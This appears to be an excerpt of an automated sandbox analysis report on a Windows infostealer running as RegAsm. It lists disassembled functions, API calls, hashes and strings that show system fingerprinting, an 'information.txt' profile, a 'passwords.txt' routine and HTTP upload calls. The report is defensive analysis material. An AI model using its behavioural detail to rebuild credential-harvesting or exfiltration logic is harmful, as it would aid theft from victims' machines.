                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 00406389
                                                                                                                                                                                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405E9B
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00406396
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 004063A0
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,015CF600,?,?,?,?,?,?,00000000), ref: 00405CAA
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$lstrlen$lstrcpy$CloseHandle$FileHeapHttpOpenReadRequestlstrcatmemcpy$AllocConnectCrackOptionProcessSend
                                                                                                                                                                                                                                                    • String ID: "$"$"$*$------$------$------$------$build_id$mode${A${A
                                                                                                                                                                                                                                                    • API String ID: 530647464-1741868562
                                                                                                                                                                                                                                                    • Opcode ID: a42581a42c37341c2c70c8d608a6b8d9b28554a4a70040449937b623cdf97783
                                                                                                                                                                                                                                                    • Instruction ID: 2abd88f26721da712bdd4eb8e4b5f156ee80a5ee9949695b18cf4aadc7b17cf9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a42581a42c37341c2c70c8d608a6b8d9b28554a4a70040449937b623cdf97783
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F525075801248EACB15EBE5C956BEEBBB85F14704F14407EE502735D2DA382B0CCBB9
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

control_flow_graph 844 4154d0-41630f
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
                                                                                                                                                                                                                                                      • Part of subcall function 00410150: GetProcessHeap.KERNEL32(00000000,00000104,?,004271C4,00000000,?,00000000,00000000), ref: 0041015E
                                                                                                                                                                                                                                                      • Part of subcall function 00410150: HeapAlloc.KERNEL32(00000000,?,004271C4,00000000,?,00000000,00000000), ref: 00410165
                                                                                                                                                                                                                                                      • Part of subcall function 00410150: GetLocalTime.KERNEL32(004271C4,?,004271C4,00000000,?,00000000,00000000), ref: 00410171
                                                                                                                                                                                                                                                      • Part of subcall function 00410150: wsprintfA.USER32 ref: 0041019D
                                                                                                                                                                                                                                                      • Part of subcall function 00410AE0: memset.MSVCRT ref: 00410B05
                                                                                                                                                                                                                                                      • Part of subcall function 00410AE0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,00000000), ref: 00410B22
                                                                                                                                                                                                                                                      • Part of subcall function 00410AE0: RegQueryValueExA.KERNEL32(00000000,MachineGuid,00000000,00000000,00000000,000000FF), ref: 00410B44
                                                                                                                                                                                                                                                      • Part of subcall function 00410AE0: CharToOemA.USER32(00000000,?), ref: 00410B62
                                                                                                                                                                                                                                                      • Part of subcall function 00410B80: GetCurrentHwProfileA.ADVAPI32(?), ref: 00410B95
                                                                                                                                                                                                                                                      • Part of subcall function 00410BE0: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00410C18
                                                                                                                                                                                                                                                      • Part of subcall function 00410BE0: GetVolumeInformationA.KERNEL32(00421639,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410C51
                                                                                                                                                                                                                                                      • Part of subcall function 00410BE0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410C9D
                                                                                                                                                                                                                                                      • Part of subcall function 00410BE0: HeapAlloc.KERNEL32(00000000), ref: 00410CA4
                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,004271FC,00000000,?,00000000,00000000,00000000,00000000), ref: 0041580B
                                                                                                                                                                                                                                                      • Part of subcall function 00411880: OpenProcess.KERNEL32(00000410,00000000,?), ref: 0041189C
                                                                                                                                                                                                                                                      • Part of subcall function 00411880: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 004118B7
                                                                                                                                                                                                                                                      • Part of subcall function 00411880: CloseHandle.KERNEL32(00000000), ref: 004118BE
                                                                                                                                                                                                                                                      • Part of subcall function 00410D90: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410DA5
                                                                                                                                                                                                                                                      • Part of subcall function 00410D90: HeapAlloc.KERNEL32(00000000), ref: 00410DAC
                                                                                                                                                                                                                                                      • Part of subcall function 00410EE0: CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,Windows: ,00000000,?,00427220,00000000,?,Work Dir: In memory,00000000,?,00427208,00000000), ref: 00410F03
                                                                                                                                                                                                                                                      • Part of subcall function 00410EE0: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,Windows: ,00000000,?,00427220), ref: 00410F14
                                                                                                                                                                                                                                                      • Part of subcall function 00410EE0: CoCreateInstance.OLE32(00427AC0,00000000,00000001,004279F0,?,?,00000000,?,Windows: ,00000000,?,00427220,00000000,?,Work Dir: In memory,00000000), ref: 00410F2E
                                                                                                                                                                                                                                                      • Part of subcall function 00410EE0: CoSetProxyBlanket.OLE32(00427208,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,Windows: ,00000000,?,00427220,00000000), ref: 00410F67
                                                                                                                                                                                                                                                      • Part of subcall function 00410EE0: VariantInit.OLEAUT32(?), ref: 00410FC6
                                                                                                                                                                                                                                                      • Part of subcall function 004110A0: CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,AV: ,00000000,?,00427244,00000000,?,00000000,00000000), ref: 004110C3
                                                                                                                                                                                                                                                      • Part of subcall function 004110A0: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,AV: ,00000000,?,00427244), ref: 004110D4
                                                                                                                                                                                                                                                      • Part of subcall function 004110A0: CoCreateInstance.OLE32(00427AC0,00000000,00000001,004279F0,?,?,00000000,?,AV: ,00000000,?,00427244,00000000,?,00000000,00000000), ref: 004110EE
                                                                                                                                                                                                                                                      • Part of subcall function 004110A0: CoSetProxyBlanket.OLE32(DrB,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,AV: ,00000000,?,00427244,00000000), ref: 00411127
                                                                                                                                                                                                                                                      • Part of subcall function 004110A0: VariantInit.OLEAUT32(?), ref: 00411182
                                                                                                                                                                                                                                                      • Part of subcall function 00410110: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00415A9E,00000000,?,Computer Name: ,00000000,?,00427250,00000000,?,00000000,00000000), ref: 0041011C
                                                                                                                                                                                                                                                      • Part of subcall function 00410110: HeapAlloc.KERNEL32(00000000,?,?,?,00415A9E,00000000,?,Computer Name: ,00000000,?,00427250,00000000,?,00000000,00000000,00000000), ref: 00410123
                                                                                                                                                                                                                                                      • Part of subcall function 00410110: GetComputerNameA.KERNEL32(00000000,00000000), ref: 00410137
                                                                                                                                                                                                                                                      • Part of subcall function 004100D0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004180F2,004271B6), ref: 004100DC
                                                                                                                                                                                                                                                      • Part of subcall function 004100D0: HeapAlloc.KERNEL32(00000000,?,?,?,004180F2,004271B6), ref: 004100E3
                                                                                                                                                                                                                                                      • Part of subcall function 004100D0: GetUserNameA.ADVAPI32(00000000,004271B6), ref: 004100F7
                                                                                                                                                                                                                                                      • Part of subcall function 00410A60: CreateDCA.GDI32(015C2E20,00000000,00000000,00000000), ref: 00410A7A
                                                                                                                                                                                                                                                      • Part of subcall function 00410A60: GetDeviceCaps.GDI32(00000000,00000008), ref: 00410A85
                                                                                                                                                                                                                                                      • Part of subcall function 00410A60: GetDeviceCaps.GDI32(00000000,0000000A), ref: 00410A90
                                                                                                                                                                                                                                                      • Part of subcall function 00410A60: ReleaseDC.USER32(00000000,00000000), ref: 00410A9B
                                                                                                                                                                                                                                                      • Part of subcall function 00410A60: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000001,?,?,00415B9A,?,00000000,?,Display Resolution: ,00000000,?,00427274,00000000), ref: 00410AA8
                                                                                                                                                                                                                                                      • Part of subcall function 00410A60: HeapAlloc.KERNEL32(00000000,?,?,00000001,?,?,00415B9A,?,00000000,?,Display Resolution: ,00000000,?,00427274,00000000,?), ref: 00410AAF
                                                                                                                                                                                                                                                      • Part of subcall function 00410A60: wsprintfA.USER32 ref: 00410ABF
                                                                                                                                                                                                                                                      • Part of subcall function 00410220: GetKeyboardLayoutList.USER32(00000000,00000000,00426EBF,?,?,00000001), ref: 00410267
                                                                                                                                                                                                                                                      • Part of subcall function 00410220: LocalAlloc.KERNEL32(00000040,00000000,?,?,00000001), ref: 00410279
                                                                                                                                                                                                                                                      • Part of subcall function 00410220: GetKeyboardLayoutList.USER32(00000000,00000000,?,?,00000001), ref: 00410284
                                                                                                                                                                                                                                                      • Part of subcall function 00410220: GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200,?,?,00000001), ref: 004102B6
                                                                                                                                                                                                                                                      • Part of subcall function 00410220: LocalFree.KERNEL32(?,?,?,00000001), ref: 0041035A
                                                                                                                                                                                                                                                      • Part of subcall function 004101B0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004101C1
                                                                                                                                                                                                                                                      • Part of subcall function 004101B0: HeapAlloc.KERNEL32(00000000), ref: 004101C8
                                                                                                                                                                                                                                                      • Part of subcall function 004101B0: GetTimeZoneInformation.KERNEL32(?), ref: 004101D7
                                                                                                                                                                                                                                                      • Part of subcall function 004101B0: wsprintfA.USER32 ref: 00410202
                                                                                                                                                                                                                                                      • Part of subcall function 00410380: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410395
                                                                                                                                                                                                                                                      • Part of subcall function 00410380: HeapAlloc.KERNEL32(00000000), ref: 0041039C
                                                                                                                                                                                                                                                      • Part of subcall function 00410380: RegOpenKeyExA.KERNEL32(80000002,015CB3D8,00000000,00020119,00000000), ref: 004103BB
                                                                                                                                                                                                                                                      • Part of subcall function 00410380: RegQueryValueExA.KERNEL32(00000000,015D17E8,00000000,00000000,00000000,000000FF), ref: 004103D6
                                                                                                                                                                                                                                                      • Part of subcall function 00410430: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00410452
                                                                                                                                                                                                                                                      • Part of subcall function 00410430: GetLastError.KERNEL32(?,?,00000001), ref: 00410460
                                                                                                                                                                                                                                                      • Part of subcall function 00410430: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00410498
                                                                                                                                                                                                                                                      • Part of subcall function 00410430: wsprintfA.USER32 ref: 004104E2
                                                                                                                                                                                                                                                      • Part of subcall function 004103F0: GetSystemInfo.KERNEL32(00000000), ref: 004103FD
                                                                                                                                                                                                                                                      • Part of subcall function 004103F0: wsprintfA.USER32 ref: 00410413
                                                                                                                                                                                                                                                      • Part of subcall function 00410530: GetProcessHeap.KERNEL32(00000000,00000104,?,TimeZone: ,00000000,?,004272C0,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,004272AC), ref: 0041053E
                                                                                                                                                                                                                                                      • Part of subcall function 00410530: HeapAlloc.KERNEL32(00000000,?,TimeZone: ,00000000,?,004272C0,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,004272AC,00000000), ref: 00410545
                                                                                                                                                                                                                                                      • Part of subcall function 00410530: GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 00410565
                                                                                                                                                                                                                                                      • Part of subcall function 00410530: wsprintfA.USER32 ref: 0041058B
                                                                                                                                                                                                                                                      • Part of subcall function 004105A0: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 004105F7
                                                                                                                                                                                                                                                      • Part of subcall function 004105A0: EnumDisplayDevicesA.USER32(00000000,00000000,000001A8,00000001), ref: 00410684
                                                                                                                                                                                                                                                      • Part of subcall function 00410950: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041099F
                                                                                                                                                                                                                                                      • Part of subcall function 00410950: Process32First.KERNEL32(00000000,00000128), ref: 004109AF
                                                                                                                                                                                                                                                      • Part of subcall function 00410950: Process32Next.KERNEL32(00000000,00000128), ref: 004109C1
                                                                                                                                                                                                                                                      • Part of subcall function 00410950: Process32Next.KERNEL32(00000000,00000128), ref: 00410A2E
                                                                                                                                                                                                                                                      • Part of subcall function 00410950: CloseHandle.KERNEL32(00000000), ref: 00410A39
                                                                                                                                                                                                                                                      • Part of subcall function 004106B0: RegOpenKeyExA.KERNEL32(00000000,015C66D8,00000000,00020019,00000000,00426ED7,?,00000001), ref: 0041070F
                                                                                                                                                                                                                                                      • Part of subcall function 004106B0: RegEnumKeyExA.KERNEL32(00000000,?,?,8sB,00000000,00000000,00000000,00000000,?,?,00000001), ref: 0041076E
                                                                                                                                                                                                                                                      • Part of subcall function 004106B0: wsprintfA.USER32 ref: 00410797
                                                                                                                                                                                                                                                      • Part of subcall function 004106B0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,?), ref: 004107B5
                                                                                                                                                                                                                                                      • Part of subcall function 004106B0: RegQueryValueExA.KERNEL32(?,015D1FD0,00000000,000F003F,?,00000400), ref: 004107E5
                                                                                                                                                                                                                                                      • Part of subcall function 004106B0: lstrlenA.KERNEL32(?), ref: 004107FA
                                                                                                                                                                                                                                                      • Part of subcall function 004106B0: RegQueryValueExA.KERNEL32(?,015D2090,00000000,000F003F,?,00000400,00000000,004215C1,?,00000000,?,00426F08), ref: 0041087E
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,?,00427348,00000000,?,00000000,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00416277
                                                                                                                                                                                                                                                      • Part of subcall function 00415250: Sleep.KERNEL32(000003E8,004221C1,004162C0,?,?,?,00000001), ref: 00415315
                                                                                                                                                                                                                                                      • Part of subcall function 00415250: CreateThread.KERNEL32(00000000,00000000,00413C30,?,00000000,00000000), ref: 00415336
                                                                                                                                                                                                                                                      • Part of subcall function 00415250: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00415342
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
• Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$Process$Alloc$wsprintf$CreateOpen$InformationInitializeQueryValuelstrcpy$EnumLocalNameProcess32lstrlen$BlanketCapsCloseCurrentDeviceDevicesDisplayHandleInfoInitInstanceKeyboardLayoutListLogicalNextProcessorProxySecurityTimeVariantlstrcat$CharComputerDirectoryErrorFileFirstFreeGlobalLastLocaleMemoryModuleObjectProfileReleaseSingleSleepSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
                                                                                                                                                                                                                                                    • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $W$Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$]|AU$information.txt
                                                                                                                                                                                                                                                    • API String ID: 1864629043-1551863989
                                                                                                                                                                                                                                                    • Opcode ID: 7eff1dcb814b99c68a84147ff3873a1869c82fe41fa7f405250466f0f98d7d50
                                                                                                                                                                                                                                                    • Instruction ID: d7993859b9aedb12a70ce0967869d7c0769366a874244706f063db3116ab8e56
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7eff1dcb814b99c68a84147ff3873a1869c82fe41fa7f405250466f0f98d7d50
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08926D75C05249E9CB15EBE1C956AEEBB785F24304F5041BEE602335D2DE382B4CCAB9
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                      • Part of subcall function 00411310: GetSystemTime.KERNEL32(?,015CF0B0,004270A0,?,00000000,00000008,?,?,00000000,004216B1,000000FF,?,0040452E,0041F9D9,00000014), ref: 00411365
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00000000,?), ref: 0040CEA9
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040CF06
                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0040CF0D
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000), ref: 0040CFBA
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,015CF8A0), ref: 0040CFD4
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 0040CFE7
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00426888), ref: 0040CFF6
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 0040D009
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,0042688C), ref: 0040D018
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,015CF8C0), ref: 0040D029
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 0040D03C
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00426890), ref: 0040D04B
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,015CF7A0), ref: 0040D05B
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 0040D06E
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00426894), ref: 0040D07D
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,015D1E38), ref: 0040D08E
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 0040D0A1
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00426898), ref: 0040D0B0
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,0042689C), ref: 0040D0BF
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(000000FF), ref: 0040D0F7
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040D149
                                                                                                                                                                                                                                                      • Part of subcall function 00406FF0: memcmp.MSVCRT ref: 0040702B
                                                                                                                                                                                                                                                      • Part of subcall function 00406FF0: memset.MSVCRT ref: 00407059
                                                                                                                                                                                                                                                      • Part of subcall function 00406FF0: LocalAlloc.KERNEL32(00000040,?), ref: 00407090
                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 0040D179
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessSystemTimememcmp
                                                                                                                                                                                                                                                    • String ID: passwords.txt
                                                                                                                                                                                                                                                    • API String ID: 998505060-347816968
                                                                                                                                                                                                                                                    • Opcode ID: e4aa435a432d1640c36eeddb60e941b99fed2284bdd932ff16391f0ed32dd5f6
                                                                                                                                                                                                                                                    • Instruction ID: 0ac359724ea6a1c8e279a26ecf75278969c2121eb42993a507c052d770502f54
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e4aa435a432d1640c36eeddb60e941b99fed2284bdd932ff16391f0ed32dd5f6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2C18C75900219ABCB14EBE4DC4AEEEBB79BF19304F10453DF512B3291DB786A08CB65
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1899 4141b0-414295 call 40fcc0 * 3 call 40fd60 * 3 call 40fcd0 * 6 1924 414298-41429f call 402660 1899->1924 1927 4143c0-4144b4 call 402390 call 4023c0 call 40fd10 * 3 call 413a00 call 40fdb0 call 40fd50 call 40ff70 StrCmpCA 1924->1927 1928 4142a5-4143bb call 402390 call 40fdb0 call 40fd50 call 4023f0 call 40fd10 * 5 call 4138c0 call 40fdb0 1924->1928 1966 414533-414549 call 40ff70 StrCmpCA 1927->1966 1967 4144b6-41450d call 4023f0 call 40fd10 * 2 call 401060 call 4138c0 1927->1967 1980 41452b-41452e call 40fd50 1928->1980 1976 41511a-415220 call 40fdb0 call 4023f0 call 40fdb0 call 40fd50 call 402680 call 40fdb0 call 40fd50 call 40fd10 * 3 call 40fd50 * 10 1966->1976 1977 41454f-414556 call 402670 1966->1977 2007 414512-414525 call 40fdb0 1967->2007 2349 415224-41524a call 40fd50 * 2 1976->2349 1986 414706-41471c call 40ff70 StrCmpCA 1977->1986 1987 41455c-414563 call 402660 1977->1987 1980->1966 2002 414722-414729 call 402660 1986->2002 2003 41500b-415115 call 40fdb0 call 402480 call 40fdb0 call 40fd50 call 4026b0 call 40fdb0 call 40fd50 call 40fd10 * 3 call 40fd50 * 10 1986->2003 1999 414569-414605 call 402420 call 40fdb0 call 40fd50 call 402480 call 40fd10 call 402420 call 401060 call 4138c0 call 40fdb0 1987->1999 2000 41460a-414687 call 402420 call 402450 call 401060 call 413a00 call 40fdb0 call 40fd50 call 40ff70 StrCmpCA 1987->2000 2179 4146fe-414701 call 40fd50 1999->2179 2000->1986 2126 414689-4146f8 call 402480 call 40fd10 * 2 call 401060 call 4138c0 call 40fdb0 2000->2126 2021 4148ef-414908 call 40ff70 StrCmpCA 2002->2021 2022 41472f-414736 call 402660 2002->2022 2003->2349 2007->1980 2035 414ef9-415006 call 40fdb0 call 402510 call 40fdb0 call 40fd50 call 4026e0 call 40fdb0 call 40fd50 call 40fd10 
* 3 call 40fd50 * 10 2021->2035 2036 41490e-414915 call 402660 2021->2036 2041 4147e3-414866 call 4024b0 call 4024e0 call 401060 call 413a00 call 40fdb0 call 40fd50 call 40ff70 StrCmpCA 2022->2041 2042 41473c-4147de call 4024b0 call 40fdb0 call 40fd50 call 402510 call 40fd10 call 4024b0 call 401060 call 4138c0 call 40fdb0 2022->2042 2035->2349 2062 414ac5-414adb call 40ff70 StrCmpCA 2036->2062 2063 41491b-414922 call 402660 2036->2063 2041->2021 2195 41486c-4148e1 call 402510 call 40fd10 * 2 call 401060 call 4138c0 call 40fdb0 2041->2195 2250 4148e7-4148ea call 40fd50 2042->2250 2093 414ae1-414ae8 call 402660 2062->2093 2094 414de4-414ef4 call 40fdb0 call 4025a0 call 40fdb0 call 40fd50 call 402710 call 40fdb0 call 40fd50 call 40fd10 * 3 call 40fd50 * 10 2062->2094 2091 4149c9-414a46 call 402540 call 402570 call 401060 call 413a00 call 40fdb0 call 40fd50 call 40ff70 StrCmpCA 2063->2091 2092 414928-4149c4 call 402540 call 40fdb0 call 40fd50 call 4025a0 call 40fd10 call 402540 call 401060 call 4138c0 call 40fdb0 2063->2092 2091->2062 2275 414a48-414ab7 call 4025a0 call 40fd10 * 2 call 401060 call 4138c0 call 40fdb0 2091->2275 2312 414abd-414ac0 call 40fd50 2092->2312 2119 414ca4-414cba call 40ff70 StrCmpCA 2093->2119 2120 414aee-414af5 call 402660 2093->2120 2094->2349 2161 414ccc-414ddf call 40fdb0 call 402630 call 40fdb0 call 40fd50 call 402740 call 40fdb0 call 40fd50 call 40fd10 * 3 call 40fd50 * 10 2119->2161 2162 414cbc-414cc7 Sleep 2119->2162 2156 414ba2-414c25 call 4025d0 call 402600 call 401060 call 413a00 call 40fdb0 call 40fd50 call 40ff70 StrCmpCA 2120->2156 2157 414afb-414b9d call 4025d0 call 40fdb0 call 40fd50 call 402630 call 40fd10 call 4025d0 call 401060 call 4138c0 call 40fdb0 2120->2157 2126->2179 2156->2119 2334 414c27-414c99 call 402630 call 40fd10 * 2 call 401060 call 4138c0 call 40fdb0 2156->2334 2362 414c9c-414c9f call 40fd50 2157->2362 2161->2349 2162->1924 2179->1986 2195->2250 2250->2021 2275->2312 2312->2062 2334->2362 2362->2119
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD60: lstrlenA.KERNEL32(004181A9,?,00000000,?,0041790D,004271B2,004271AF,00000000,?,00000000,004228A8,000000FF,?,004181A9), ref: 0040FD6B
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD60: lstrcpy.KERNEL32(00000000,004181A9), ref: 0040FDA2
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004144AC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD10: lstrcpy.KERNEL32(00000000), ref: 0040FD38
                                                                                                                                                                                                                                                      • Part of subcall function 004138C0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413932
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414541
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041467F
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414714
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041485E
